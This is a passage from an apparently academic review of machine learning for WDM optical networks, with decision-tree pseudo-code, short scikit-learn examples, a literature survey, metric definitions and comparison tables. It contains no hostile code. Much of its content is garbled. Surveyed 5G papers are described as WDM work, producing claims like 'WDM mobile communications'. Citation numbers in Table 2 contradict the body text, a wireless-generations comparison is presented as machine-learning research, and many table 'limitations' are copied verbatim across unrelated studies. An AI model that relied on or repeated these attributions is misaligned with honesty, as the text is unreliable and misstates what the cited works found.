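# PCA: reduce the dimensionality to make later computations faster.
X_reduced = PCA(n_components=2).fit_transform(X)
print(X_reduced.shape)                   # (300, 2)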
As shown in Fig. 1, the values of only one attribute are considered at a time by the
decision tree algorithm to create a tree model. The dataset on attribute value is sorted
initially by the algorithm. In the next step, the regions in a dataset which clearly
include only one class are identified. These regions are then marked as leaves. The
algorithm chooses another attribute for the remaining regions, which contain more than one class. The branching process is continued using only the instances present in these regions.
The process works iteratively until no attributes are left to generate leaves or until
all the leaves possible in those regions are generated. The pseudo-code of the optimal
decision tree algorithm is presented below:
Input: Data partition D // the set of training tuples and their associated class labels
attribute_list // the set of candidate attributes
attribute_selection_method // determines the best criterion for partitioning the data tuples among the individual classes
Output: A decision tree.
Algorithm:
• Create a node N;
• if all the tuples in D belong to the same class C, then
  return N as a leaf node labelled with class C;
• if attribute_list is empty, then
  return N as a leaf node labelled with the majority class in D; // majority voting
• apply attribute_selection_method to identify the best splitting_criterion;
• label node N with the splitting criterion;
• if splitting_attribute is discrete-valued and multi-way splits are allowed, then // not restricted to binary trees
  attribute_list = attribute_list − splitting_attribute; // eliminate splitting_attribute
• for each outcome j of splitting_criterion // partition the tuples and generate a sub-tree for each partition
  let Dj be the set of data tuples in D that achieve outcome j; // a partition
  if Dj is empty then
    attach a leaf labelled with the majority class in D to node N;
  else attach the node returned by Generate_decision_tree(Dj, attribute_list) to node N;
  endfor
• return N;
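The same recursive partitioning can be obtained from an off-the-shelf implementation; the snippet below is a small scikit-learn sketch on the Iris data (not the optical-network datasets discussed later), included purely to illustrate the algorithm above.

from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier, export_text

X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

# The criterion plays the role of attribute_selection_method in the pseudo-code.
tree = DecisionTreeClassifier(criterion="entropy", max_depth=3).fit(X_train, y_train)
print(tree.score(X_test, y_test))        # accuracy on held-out samples
print(export_text(tree))                 # textual view of the learned splits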
Due to their special features such as low cost and high capacity, optical networks form the basic physical infrastructure of all the large-provider networks available.
approaches have been proposed to improve optical network performance in terms
of their survivability, traffic grooming, wavelength assignment and routing [13].
This network must focus on provisioning the bandwidth for various services and
ensuring resource allocation in multiple dimensions. However, due to such require-
ments, the operation and maintenance of optical networks are complex compared
to other communication networks. The most commonly faced challenges in optical
networks are:
(1) Network Complexity: With the extension in scale of optical networks, the
number of complexity of their devices also increases [14]. Furthermore, in
communication systems, the optical network carries multiple heterogeneous
networks like cloud computing, IoT, WDM mobile networks and vehicle
networking.
(2) Service complexity: The optical networks are applied to provide varieties of
services at different levels of quality of service (QoS). The service provision is
expected to be implemented in real-time in new techniques and applications.
Therefore, ensuring the QoS of each level within a limited time period is very difficult for optical networks.
(3) Resource management complexity: Since it acts as a bridge in between the
upper layer traffic, the optical network must provide resource allocation to
handle traffic for the physical layer [15]. Huge amount of time is consumed
when allocating multiple resources in multiple dimensions. The complexity of
this process also increases due to the presence of varieties of resources.
To resolve all such challenges in optical networks, machine learning techniques are
used. ML techniques are applied in optical networks for network control and resource
management that are useful in service provisioning and resource assignment. These
techniques also provide intelligent monitoring tasks for optical networks such as

monitoring the performance of physical layer link, signal and failure management
[16].
Figure 2 shows the general system architecture of optical networks incorporating
machine learning techniques. This system deploys an intelligent module that includes
functional elements (FEs) and ML agents. FEs help in performing interactions among
the ML agent and optical networks. In this process, the raw data is first collected
from the optical network in the data collection module. Further, this data is pre-
processed to certain data structure through data processing module [17] so that it
can be used for training ML models. For supporting FE on network data collection

Fig. 2 General architecture of ML incorporated with optical networks [20]

and processing, network protocols and functions are required to be improved. The
next step is to train the data which is done by forwarding this pre-processed network
data to the ML agents. There are three important paradigms of optical networks in
which the ML agent generally works [18]. They are: regression, classification and
decision-making. To solve the regression and classification problems, supervised and
unsupervised learning are applied. Iterative optimization is performed using learning
algorithms with training datasets to determine the ML model parameters as shown
in Fig. 2a. The methods that enhance the model performance are known as learning
algorithms. The optimal strategy is learned by the ML models in the decision-making
tasks by interacting with the environment which here is the optical network as shown
in Fig. 2b. Depending upon the performance of action, the algorithm receives a
reward in such networks. It is then possible to update the decision-making problems
using such rewards in new strategies. For most of the decision-making problems,
reinforcement learning methods are applied [19].
WDM is designed as a leading infrastructure technology for the information and communication technology industry, supporting the demand of accommodating growth in mobile traffic and the variety of new services with diverse requirements. Considering the increase in the complexity of networks and the evolution of new use cases over time, it is important to include ML in making the WDM vision conceivable. This technology ensures that, in comparison to previous technologies, users are provided with higher security, reliability and flexibility.
The paper is organized as follows. Section 1 introduces the basic concept of
machine learning in context to WDM optical networks. Section 2 describes the
previous research work in the development of WDM high-speed optical networks.
Section 3 outlines the performance parameters. Section 4 explains the performance
outcomes of existing techniques. Finally, we conclude the research paper with future
scope in Sect. 5 and 6, respectively.

2 Literature Survey

Gao et al. (2020) reviewed the different problems solved using machine learning
methods [21]. There are still many challenges being faced when applying ML tech-
niques to optical networks, although several advancements have been made on this
technology. The four typical applications that included AI techniques which are
power optimization, failure management, routing and wavelength assignment (RWA)
and low-margin design were reviewed in this paper. It was seen that in terms of reli-
ability and capacity, the performances of these applications were enhanced when
applying ML. Thus, the review outlined the possible challenges and future research
directions for optical networks using ML techniques.
Gu et al. (2020) presented a survey for intelligent optical networks applying ML.
Based on their use cases, the applications of ML were categorized [20]. Resource
management, optical networks monitoring and survivability and optical network
control were the common categorizations. Based on the ML techniques used, the use

cases were analysed and compared. Depending on such previous analysis, the new
motivations were derived. Additionally, this survey also discussed the challenges and
possible solutions for intelligent optical networks using ML.
Panayiotou et al. (2020) examined the different ML-based frameworks designed
to achieve QoT [22]. Since the requirements of QoTs are diverse, it was important
to identify appropriate frameworks. It was seen that particularly with the increase
in the number of diverse QoT requirements, distributed QoT model’s performance
was better compared to centralized ones. Additional QoS could be achieved in the
ML-based optical frameworks by analysing centralized and distributed frameworks
in terms of management and efficiency control.
Khan et al. (2020) proposed that for fibre-optic communication systems, the ML
techniques would provide unique and powerful signal processing tools [23]. For
resolving challenges that could not be handled using traditional approaches, ML
and big data analytics could provide better outcomes for optical networks, which
are growing with speed and are being more dynamic and software-defined. Thus, in
optical communications and networking, ML-based knowledge skills proved to be
highly beneficial.
Yang et al. (2020) proposed a new mechanism for achieving zero-touch operation
in optical network architecture [24]. Without any manual interference, the mainte-
nance and intent-based network operation-based issues could be resolved through
this approach. In optical network automatic operation, the functional entities of
architecture and interworking process were studied in this research. Experiments
were conducted, and the outcomes achieved showed that the intent translation and
zero-touch configuration were performed effectively. The zero-touch configuration
operation was protected by two closed loops, which included closed-loop policy and
closed-loop intent.
Hindia et al. (2020) proposed a comparative analysis of cognitive radio (CR)-based
technology in WDM technology [25]. Based on spectrum allocation methods, the
impact and roles of MAC layer in spectrum sensing and sharing were presented in this
research. The various intelligent routing protocols viable were analysed. The research
showed that the primary motivation of future research could be the issues related to
reduction in spectrum and lower usage of resources. For future WDM networks, the
CR technology could maximize the usage of highly unused communication spectrum
bands.
Troia et al. (2019) proposed research in which the dynamic SFC resource alloca-
tion was applied for software defined network (SDN)-based optical networks using
reinforcement learning (RL) [26]. For optimizing the resources allocation in multi-
layer networks, an RL system was designed in this research. Provided the state
of network and historical traffic traces, the decision of reconfiguring service func-
tion chains (SFCs) was made by RL agents. The proposed method was compared
with a rule-based optimization design which showed that the proposed method
provided better outcomes. The sudden changes in traffic shape were predicted, and
the reconfiguration of SFCs was triggered using this method.
Musumeci et al. (2019) presented a study of the optical communication and
networking approaches using ML [27]. A survey of relevant studies was conducted in

this research, and an introductory tutorial on ML was performed to help researchers


in future research. Applying ML in optical networks is very new even though several
researches have been published. New possible research directions were outlined
through this research for providing ease in further research simulations.
Morocho-Cayamcela et al. (2019) proposed research on ML-based WDM
networks to provide potential solutions [28]. Initially, the previously existing ML-
based techniques were reviewed in this research to understand the fundamental
concepts. Further, to contribute to the WDM network requirements, the promising
ML-based techniques and their contributions were studied. The outcomes, limita-
tions and particular use cases for these techniques were studied. Towards the end,
the future perspectives for WDM were discussed. The roles of ML techniques were
simulated in this paper to deploy autonomous WDM mobile communications.
Toscano et al. (2019) proposed a novel deep learning algorithm for optical
networks [29]. A network slice request to be fulfilled by a service provider was
predicted in certain resources and channel constraints. To predict the channel condi-
tions for upcoming future technologies, a long short-term memory network was
designed and implemented in this research using deep learning algorithm. Conducted
experiments and achieved outcomes showed that the numbers of false-positive
allocations were reduced by 75% by applying this proposed approach.
Casellas et al. (2018) proposed a novel architecture for providing automatic
deploying in WDM services being applied in metropolitan networks [30]. For
allowing an interface among WDM access networks and elastic core optical networks,
this research was proposed. The infrastructure nodes, including storage, processing
resources and networking, were used to design this network segment also known
as metro-haul. The open and disaggregated optical networks were interconnected
with these infrastructure nodes. For covering the metropolitan networks that were an
interface with WDM access networks using elastic core optical networks, the WDM
services were deployed to provide control, management and orchestration.
Morais et al. (2018) proposed research through which the effectiveness of different
ML models was evaluated [31]. Predicting the QoT of a lightpath and increasing the
speed of lightpath provisioning were the goals of this research. For generating the
knowledge database through which the models were trained, three different network
scenarios were studied here. The most commonly used machine learning models
were also reviewed in this research. For estimating the QoT of lightpath, ML was
shown to be very effective as per this research. With accuracies of 99%, the ANNs
provided the best generalization. Further, the residual margin with an average error
less than 0.4 dB was predicted through ANNs.
Pelekanou et al. (2018) proposed a novel approach in which less complicated ML
techniques were applied to design optimal online WDM service provision frame-
works [32]. For making optimal decisions, neural networks (NNs) were applied. The
overall energy consumption of WDM infrastructures was aimed to be reduced using
this framework. The conducted experiments and achieved results showed that the
performances of systems, including highly complex but accurate ILP approach and
the ones including NN based real-time service, were very similar.

Wang et al. (2018) proposed research in which a hybrid method was identified as
channel coding for WDM communications in enhanced mobile broadband (eMBB)
scenario to support the polar codes for the LDPC codes and control plane [33].
Designing the powerful decoders at the terminal side was the major challenge faced in
this research. By concatenating an indicator section, a deep learning-based LDPC was
proposed here. A comparative evaluation was performed to evaluate the performances
of traditional and newly designed methods. The implementation resources were saved
here since the proposed unified approach applied similar network architecture and
parameters.
Fagbohun (2014), proposed a study in which the devices with effective connection
and communication services were provided with new ML technology with the aim
of increasing the flexibility of network connectivity and providing supporting capa-
bility [34]. The communication-related issues were not resolved using traditionally
designed techniques. Wireless technology has risen to a new level with the involve-
ment of WDM. These systems would work on providing simple network scenarios
with more functionality to the end nodes. The future concepts of mobile communica-
tion would link the multiple diverse research approaches being designed to provide
improvement in this field (Table 1).

3 Performance Parameters

It is important to measure the performance of an ML algorithm on unseen or unlabelled data so that its outputs can be determined when it is applied in real-time applications. Depending upon the task being performed by the system, an appropriate performance measure can be specified.
a. Accuracy: The percentage of samples for which correct output is produced by
an algorithm is known as its accuracy. This parameter is used for tasks like
classification.
b. Error Rate: The proportion of examples for which an incorrect output is gener-
ated by the model is known as error rate. A test set of data that is isolated from
the data used for training ML is used for evaluating such performance measures
[27].
c. Confusion matrix: The complete overview of the classifier's performance is
provided through the confusion matrix when a binary classification problem is
given in which the samples of the test set belong to either a positive or a
negative class. The matrix consists of TP, TN, FP and FN. TP (true positives)
are the positive samples correctly classified as positive, and TN (true negatives)
are the negative samples correctly classified as negative [35]. FP (false positives)
are the negative samples incorrectly classified as positive, and FN (false
negatives) are the positive samples incorrectly classified as negative. Here,
the accuracy can then be defined as:

Accuracy = (TP + TN)/(TP + TN + FP + FN) (1)

Table 1 Comparative analysis of ML techniques for WDM optical networks
(for each study: Ref. No., authors and year, proposed technique, result outcomes, and limitations and future scope)

[21] Ruoxuan Gao et al. (2020)
Proposed technique: The four typical applications that included AI techniques, namely power optimization, failure management, routing and wavelength assignment (RWA), and low-margin design, were reviewed in this paper.
Result outcomes: It was seen that in terms of reliability and capacity, the performances of these applications were enhanced when applying ML. The review thus outlined the possible challenges and future research directions for optical networks using ML techniques.
Limitations and future scope: The network management operations to be performed in optical networks were not reviewed in this research and could be used as a future perspective.

[20] Gu et al. (2020)
Proposed technique: Based on the ML techniques used, the use cases were analysed and compared. Depending on such previous analysis, the new motivations were derived.
Result outcomes: Several issues faced when using optical networks with ML were highlighted through this research.
Limitations and future scope: The joint operations of networks and computing resources were not discussed in this research. Future research could focus on removing this limitation.

[22] Panayiotou et al. (2020)
Proposed technique: Since the requirements of QoT are diverse, it was important to identify appropriate frameworks. Depending upon the training time and accuracy, the simulations were performed.
Result outcomes: It was seen that, particularly with the increase in the number of diverse QoT requirements, the performance of distributed QoT models was better as compared to centralized ones.
Limitations and future scope: QoS could be achieved in ML-based optical frameworks by analysing centralized and distributed frameworks in terms of management and efficiency control.

[23] Khan et al. (2020)
Proposed technique: For resolving challenges which could not be handled using traditional approaches, ML and big data analytics could provide better outcomes for optical networks, which are growing with speed and are becoming more dynamic and software-defined.
Result outcomes: In optical communications and networking, ML-based knowledge and skills proved to be highly beneficial.
Limitations and future scope: The computational complexity of ML algorithms was not discussed in this paper, which could be a motivation to extend this research in future.

[24] Yang, Zhan, et al. (2020)
Proposed technique: A new mechanism was proposed for achieving zero-touch operation in optical network architecture. Without any manual interference, the maintenance and intent-based network operation issues could be resolved through this approach.
Result outcomes: The zero-touch configuration operation was protected by two closed loops.
Limitations and future scope: There was a huge reality gap between the simulation and real networks, which could be used as a motivation to extend this research in future.

[25] Hindia et al. (2020)
Proposed technique: A comparative analysis of cognitive radio (CR)-based technology in WDM technology was presented. Based on spectrum allocation methods, the utilization of MAC was presented in this research.
Result outcomes: The research showed that the primary motivation of future research could be the issues related to spectrum and resource underutilization.
Limitations and future scope: For future WDM networks, the CR technology could maximize the usage of highly unused communication spectrum bands.

[26] Troia et al. (2019)
Proposed technique: Dynamic SFC resource allocation was applied for SDN-based optical networks using RL. For optimizing the resource allocation in multi-layer networks, an RL system was designed.
Result outcomes: The outcomes showed a rapid variation in the traffic as well as triggering of reconfiguration of SFCs.
Limitations and future scope: The computational complexity of ML algorithms was not discussed in this paper, which could be a motivation to extend this research in future.

[27] Musumeci et al. (2019)
Proposed technique: A survey of relevant studies was conducted and an introductory tutorial on ML was provided to help researchers in future research. Applying ML in optical networks is very new even though several studies have been published.
Result outcomes: New possible research directions were outlined through this research for providing ease in further research simulations.
Limitations and future scope: The computational complexity of ML algorithms was not discussed in this research. This could be used as a future direction to extend this research.

[28] Eugenio et al. (2019)
Proposed technique: Research was proposed on ML-based WDM networks to provide potential solutions. Initially, the previously existing ML-based techniques were reviewed to understand the fundamental concepts. Further, to contribute to the WDM network requirements, the promising ML-based techniques and their contributions were studied.
Result outcomes: Towards the end, the future perspectives for WDM were discussed. The roles of ML techniques were simulated in this paper to deploy autonomous WDM mobile communications.
Limitations and future scope: The security of optical networks was not discussed in this research. Using ML algorithms could introduce several intrusions, and optical networks might face integrity-based challenges, which can be studied in future research.

[29] Toscano et al. (2019)
Proposed technique: To predict the channel conditions for upcoming future technologies, a long short-term memory network was designed and implemented in this research using a deep learning algorithm.
Result outcomes: Conducted experiments and achieved outcomes showed that the number of false positive allocations was reduced by 75% by applying this proposed approach.
Limitations and future scope: The computational complexity of ML algorithms was not discussed in this research. This could be used as a future direction to extend this research.

[30] Casellas et al. (2018)
Proposed technique: A novel architecture was proposed for providing automatic deployment of WDM services being applied in metropolitan networks. This research was proposed for allowing an interface among WDM as well as optical networks.
Result outcomes: For covering the metropolitan networks that were an interface with WDM using optical networks, the WDM services were deployed to provide control, management and orchestration.
Limitations and future scope: The computational complexity of ML algorithms was not discussed in this paper, which could be a motivation to extend this research in future.

[31] Morais et al. (2018)
Proposed technique: The effectiveness of different ML models was evaluated. Predicting the QoT of a lightpath and increasing the speed of lightpath provisioning were the goals of this research.
Result outcomes: With accuracies of 99%, the ANNs provided the best generalization. Further, the residual margin with an average error of less than 0.4 dB was predicted through ANNs.
Limitations and future scope: The future concepts of mobile communication would link the multiple diverse research approaches being designed to provide improvement in this field.

[32] Pelekanou et al. (2018)
Proposed technique: A novel approach was proposed in which less complex ML techniques were applied to design optimal online WDM service provision frameworks. For making optimal decisions, neural networks (NNs) were applied.
Result outcomes: The conducted experiments and achieved results showed that the performances of systems including the highly complex but accurate ILP approach and the ones including the NN-based real-time service were very similar.
Limitations and future scope: There was a huge reality gap between the simulation and real networks, which could be used as a motivation to extend this research in future.

[33] Wang et al. (2018)
Proposed technique: A hybrid method was identified as channel coding for WDM communications in the enhanced mobile broadband (eMBB) scenario. By concatenating an indicator section, a deep learning-based unified polar-LDPC decoder was proposed here.
Result outcomes: The implementation resources were saved since the proposed unified approach applied similar network architecture and parameters.
Limitations and future scope: This research did not focus on the attacks and intrusion detection methods for optical networks applying ML algorithms. Future research could focus on this challenge.

[34] Fagbohun (2014)
Proposed technique: The devices with effective connection and communication services were provided with new ML technology with the aim of increasing the flexibility of network connectivity and providing supporting capability.
Result outcomes: The communication-related issues were not resolved using traditionally designed techniques. These systems would work on providing simple network scenarios with more functionality to the end nodes.
Limitations and future scope: The future concepts of mobile communication would link the multiple diverse research approaches being designed to provide improvement in this field.

d. Average log-probability: This performance metric is used for unsupervised
learning tasks as it provides a continuous-valued score for every example.
e. True Positive Rate (TPR): The ability to identify actually positive samples in
the test set is defined by this metric.

TPR = TP/(TP + FN) (2)

f. False Positive Rate (FPR): The fraction of negative samples within the test set
that are classified incorrectly as positive are represented by FPR.

FPR = FP/(FP + TN) (3)

g. Area-Under-Curve (AUC): It is an aggregate measure of performance across all
the calculated classification thresholds. In other words, it is the probability
that the model ranks a random positive instance higher than a random negative
instance [36].
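As a quick illustration of how the measures listed in (a)–(g) are computed for a binary classifier, the following minimal Python sketch (a generic example, not taken from any of the cited studies) derives accuracy, TPR, FPR and AUC from the confusion-matrix counts with scikit-learn; the label and score vectors are placeholders.

```python
# Minimal illustration of the performance measures above (placeholder data).
from sklearn.metrics import confusion_matrix, roc_auc_score

y_true  = [1, 0, 1, 1, 0, 0, 1, 0]                   # ground-truth test labels
y_pred  = [1, 0, 1, 0, 0, 1, 1, 0]                   # hard decisions of the classifier
y_score = [0.9, 0.2, 0.8, 0.4, 0.1, 0.7, 0.6, 0.3]   # continuous scores used for AUC

# confusion_matrix returns [[TN, FP], [FN, TP]] for binary labels
tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()

accuracy   = (tp + tn) / (tp + tn + fp + fn)          # Eq. (1)
error_rate = 1 - accuracy
tpr        = tp / (tp + fn)                           # Eq. (2), true positive rate
fpr        = fp / (fp + tn)                           # Eq. (3), false positive rate
auc        = roc_auc_score(y_true, y_score)           # area under the ROC curve

print(f"Accuracy={accuracy:.2f}  TPR={tpr:.2f}  FPR={fpr:.2f}  AUC={auc:.2f}")
```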

4 Performance Outcomes of Existing Techniques

To control heterogeneous optical networks, various ML techniques were applied that
were reviewed in terms of their performance outputs in [37]. Case-based reasoning
(CBR), naïve Bayes, J4.8 tree and decision tree were compared to evaluate their
outcomes. It was seen that, with the highest accuracy of 99% and AUC of 0.97, CBR
provided the best outcomes. To predict the optimization and performance outcomes
of ML techniques, k-nearest neighbour and random forest (RF) were compared in
[34]. With 97% accuracy and AUC of 0.98, RF provided better outputs as per the
simulations. To perform lightpath classification with better outcomes, k-NN, SVM
and RF were compared in [38]. With 99.15% accuracy and AUC of 0.9909, SVM
proved to be better than the other algorithms. To detect equipment failures in optical
networks, three commonly used ML techniques, SVM, RF and NN, were compared
[39]. With 100% accuracy and AUC of 0.99, SVM provided the best simulation
outputs. Table 2 presents the outputs of these techniques as numerical values. The
comparative analysis of these techniques is also shown in Figs. 3 and 4 in terms of
accuracy and AUC, respectively.
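For orientation, the sketch below shows how a comparison of this kind (k-NN, RF and SVM scored by accuracy and AUC) could be set up with scikit-learn; the synthetic dataset merely stands in for the lightpath/QoT and failure data used in the cited works, and the hyperparameters are illustrative assumptions rather than those of the original studies.

```python
# Illustrative classifier comparison; the synthetic data is a stand-in only.
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score, roc_auc_score

X, y = make_classification(n_samples=2000, n_features=10, random_state=0)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.2, random_state=0)

models = {
    "k-NN": KNeighborsClassifier(n_neighbors=5),
    "RF":   RandomForestClassifier(n_estimators=100, random_state=0),
    "SVM":  SVC(probability=True, random_state=0),
}
for name, model in models.items():
    model.fit(X_tr, y_tr)
    acc = accuracy_score(y_te, model.predict(X_te))
    auc = roc_auc_score(y_te, model.predict_proba(X_te)[:, 1])
    print(f"{name}: accuracy={acc:.4f}  AUC={auc:.4f}")
```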

Table 2 Comparative analysis of various techniques in terms of accuracy and AUC

Performance parameter   CBR [33]   RF [34]   SVM [35]
Accuracy                99%        97%       99.15%
AUC                     0.97       0.98      0.9909

Fig. 3 Comparison of ML algorithms in terms of accuracy

Fig. 4 Performance analysis of ML algorithms in terms of AUC

5 Conclusion

This paper reviews several machine learning-based algorithms applied in optical
networks for high-speed WDM networks. Recently, optical networks have been
evolving in several applications like 5G and IoT, and advancements have been made
in these networks by applying machine learning algorithms. The machine learning
applications in the estimation of QoT, traffic estimation, prediction of crosstalk,
etc., are also elaborated. Further, this paper highlights the challenges, issues
and future techniques related to WDM high-speed optical networks. Lastly, this
paper concludes that SVM, RF and CBR provide better simulation outcomes in terms of
the accuracy and AUC performance parameters.

6 Future Scope

This review also outlines the future directions through which this technology can be
improved. ML algorithms used in optical networks make them vulnerable to various
security attacks and intrusions. To maintain data integrity, future research could
provide more reliable and secure techniques. Additionally, new approaches could
emphasize maximizing the usage of highly unused communication spectrum
bands in optical networks.

References

1. Liu, J., Wang, G., Hu, P., Duan, L. Y., & Kot, A. C. (2017). Global context-aware attention
LSTM networks for 3D action recognition. In Proceedings—30th IEEE Conference Computer
Vision Pattern Recognition, CVPR 2017 (vol. 2017-Janua, pp. 3671–3680). https://doi.org/10.
1109/CVPR.2017.391.
2. Zibar, D., Piels, M., Jones, R., & Schaeffer, C. G. (2015). Machine learning techniques in
optical communication. https://doi.org/10.1109/ECOC.2015.7341896.
3. Tiwari, P., et al. (2018). Detection of subtype blood cells using deep learning. Cognitive Systems
Research, 52, 1036–1044. https://doi.org/10.1016/j.cogsys.2018.08.022
4. Pan, C., Henning, B., Idler, W., Schmalen, L., & Fellow, F. R. K. (2015). Optical nonlinear-
phase-noise compensation for a code-aided expectation-maximization algorithm (no. July,
pp. 1–8).
5. Xu, R., & Wunsch, D. (2005). Survey of clustering algorithms. IEEE Transactions on Neural
Networks, 16(3), 645–678. https://doi.org/10.1109/TNN.2005.845141
6. Song, C., Zhang, M., Huang, X., Zhan, Y., Wang, D., Liu, M. (2018). Machine learning enabling
traffic-aware dynamic slicing for 5G optical transport networks. [Online]. Available: https://
www.osapublishing.org/oe/viewmedia.cfm?uri=oe-21-12-14859&seq=0.
7. Macaluso, I., Finn, D., Ozgul, B., & Dasilva, L. A. (2013). Complexity of spectrum activity and
benefits of reinforcement learning for dynamic channel selection. IEEE Journal on Selected
Areas in Communications, 31(11), 2237–2248. https://doi.org/10.1109/JSAC.2013.131115
8. Ye, H., Li, G. Y., & Juang, B. H. (2018). Power of deep learning for channel estimation and signal
detection in OFDM systems. IEEE Wireless Communications Letters, 7(1), 114–117. https://doi.
org/10.1109/LWC.2017.2757490
9. O'Shea, T. J., Erpek, T., & Clancy, T. C. (2017). Deep learning-based MIMO communi-
cations. arXiv, pp. 1–9.
10. Thrane, J., Wass, J., Piels, M., Diniz, J. C. M., Jones, R. T., & Zibar, D. (2017). Machine
learning technique for optical performance monitoring from directly detected PDM-QAM
signals. Journal of Lightwave Technology, 35(4), 868–875.
11. Angelou, M., Pointurier, Y., Careglio, D., & Spadaro, S. (2012). Optimized monitor placement
for accurate QoT assessment in core optical networks. Journal of Optical Communications
and Networking, 4(1), 15–24. [Online]. Available: https://www.osapublishing.org/oe/abstract.
cfm?uri=oe-18-2-670.
12. Karim, M., & Rahman, R. M. (2013). Decision Tree and Naïve Bayes Algorithm for Classi-
fication and Generation of Actionable Knowledge for Direct Marketing. Journal of Software
Engineering and Applications, 06(04), 196–206. https://doi.org/10.4236/jsea.2013.64025
13. Sartzetakis, I., Christodoulopoulos, K., Tsekrekos, C. P., Syvridis, D., & Varvarigos, E. (2016).
Quality of transmission estimation in WDM and elastic optical networks accounting for space-
spectrum dependencies. Journal of Optical Communications and Networking, 8(9), 676–688.
https://doi.org/10.1364/JOCN.8.000676
14. Pointurier, Y., Coates, M., & Rabbat, M. (2011). Cross-layer monitoring in transparent optical
networks. Journal of Optical Communications and Networking, 3(3), 189–198. https://doi.org/
10.1364/JOCN.3.000189
15. Sambo, N., Pointurier, Y., Cugini, F., Valcarenghi, L., Castoldi, P., & Tomkos, I. (2010). Light-
path establishment assisted by offline QoT estimation in transparent optical networks. Journal
of Optical Communications and Networking, 2(11), 928–937. https://doi.org/10.1364/JOCN.
2.000928

16. Barletta, L., Giusti, A., Rottondi, C., & Tornatore, M. (2017). QoT estimation for unestablished
lightpaths using machine learning. In 2017 Optical Fiber Communications Conference and Exhibition
(OFC)—Proceedings (pp. 5–7). https://doi.org/10.1364/ofc.2017.th1j.1.
17. Seve, E., Pesic, J., Delezoide, C., Bigo, S., & Pointurier, Y. (2018). Learning process for
reducing uncertainties on network parameters and design margins. Journal of Optical Commu-
nications and Networking, 10(2), A298–A306. https://doi.org/10.1364/JOCN.10.00A298
18. Panayiotou, T., Ellinas, G., & Chatzis, S. P. (2016). A data-driven QoT decision approach
for multicast connections in metro optical networks. In 2016 International Conference on
Optical Network Design and Modeling ONDM 2016, no. Dec 2017, 2016 https://doi.org/10.
1109/ONDM.2016.7494074.
19. Panayiotou, T., Chatzis, S. P., & Ellinas, G. (2017). Performance analysis of a data-driven
quality-of-transmission decision approach on a dynamic multicast- capable metro optical
network. Journal of Optical Communications and Networking, 9(1), 98–108. https://doi.org/
10.1364/JOCN.9.000098
20. Gu, R., Yang, Z., & Ji, Y. (2020). Machine learning for intelligent optical networks: A compre-
hensive survey. Journal of Networking Computer Application, 157. https://doi.org/10.1016/j.
jnca.2020.102576.
21. Gao, R., et al. (2020). An overview of ML-based applications for next generation optical
networks. Science China Information Sciences, 63(6), 1–16. https://doi.org/10.1007/s11432-
020-2874-y
22. Panayiotou, T., Savva, G., Tomkos, I., & Ellinas, G. (2019). Centralized and distributed machine
learning-based QoT estimation for sliceable optical networks. arXiv.
23. Khan, F. N., Fan, Q., Lu, C., & Lau, A. P. T. (2019). Machine learning methods for optical
communication systems and networks. Elsevier Inc.
24. Zhan, K., et al. (2020). Intent defined optical network: Toward artificial intelligence-based
optical network automation. In Optics InfoBase Conference Papers (vol. Part F174-, no. June,
pp. 1–12, 2020). https://doi.org/10.1364/OFC.2020.T3J.6.
25. Hindia, M. N., Qamar, F., Ojukwu, H., Dimyati, K., Al-Samman, A. M., & Amiri, I. S.
(2020). On Platform to Enable the Cognitive Radio Over 5G Networks. Wireless Personal
Communications, 113(2), 1241–1262. https://doi.org/10.1007/s11277-020-07277-3
26. Troia, S., Alvizu, R., & Maier, G. (2019). Reinforcement learning for service function chain
reconfiguration in NFV-SDN metro-core optical networks. IEEE Access, 7, 167944–167957.
https://doi.org/10.1109/ACCESS.2019.2953498
27. Musumeci, F., et al. (2019). An Overview on Application of Machine Learning Techniques in
Optical Networks. IEEE Communication Survey Tutorials, 21(2), 1383–1408. https://doi.org/
10.1109/COMST.2018.2880039
28. Morocho-Cayamcela, M. E., Lee, H., & Lim, W. (2019). Machine learning for 5G/B5G
mobile and wireless communications: Potential, limitations, and future directions. IEEE Access,
7(Sept), 137184–137206. https://doi.org/10.1109/ACCESS.2019.2942390
29. Toscano, M., Grunwald, F., Richart, M., Baliosian, J., Grampín, E., & Castro, A. (2019).
Machine learning aided network slicing. In International Conference on Transparent Optical
Networks (ICTON) (Vol. 2019-July, pp. 8–11, 2019). https://doi.org/10.1109/ICTON.2019.884
0141.
30. Casellas, R., et al. (2018). Enabling data analytics and machine learning for 5G services
within disaggregated multi-layer transport networks. In International Conference on Trans-
parent Optical Networks (ICTON) (vol. 2018-July, pp. 1–4). https://doi.org/10.1109/ICTON.
2018.8473832.
31. Morais, R. M., & Pedro, J. (2018). Machine learning models for estimating quality of trans-
mission in DWDM networks. Journal of Optical Communications and Networking, 10(10),
D84–D99. https://doi.org/10.1364/JOCN.10.000D84
32. Pelekanou, A., Anastasopoulos, M., Tzanakaki, A., & Simeonidou, D. (2018). Provisioning
of 5G services employing machine learning techniques. In 2018 International Conference on
Optical Network Design and Modeling (ONDM) 2018—Proceedings (vol. 1, pp. 200–205)
https://doi.org/10.23919/ONDM.2018.8396131.

33. Wang, Y., Zhang, Z., Zhang, S., Cao, S., & Xu, S. (2018). A unified deep learning based
polar-LDPC decoder for 5G communication systems. In 2018 10th International Conferences
of Wireless Communication Signal Process. WCSP 2018 (pp. 1–6). https://doi.org/10.1109/
WCSP.2018.8555891.
34. Fagbohun, O. O. (2014). Comparative studies on 3G,4G and 5G wireless technology. IOSR
Journal Electronics Communication Engineering, 9(2), 133–139. https://doi.org/10.9790/
2834-0925133139
35. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran,
M. (2020). An optimal pruning algorithm of classifier ensembles: Dynamic programming
approach. Neural Computing and Applications, 32(20), 16091–16107. https://doi.org/10.1007/
s00521-020-04761-6
36. Rottondi, C., Barletta, L., Giusti, A., & Tornatore, M. (2018). Machine-learning method for
quality of transmission prediction of unestablished lightpaths. Journal of Optical Communi-
cations and Networking, 10(2), A286–A297. https://doi.org/10.1364/JOCN.10.00A286
37. De Miguel, I., et al. (2013). Cognitive dynamic optical networks. In Optical Fiber Communi-
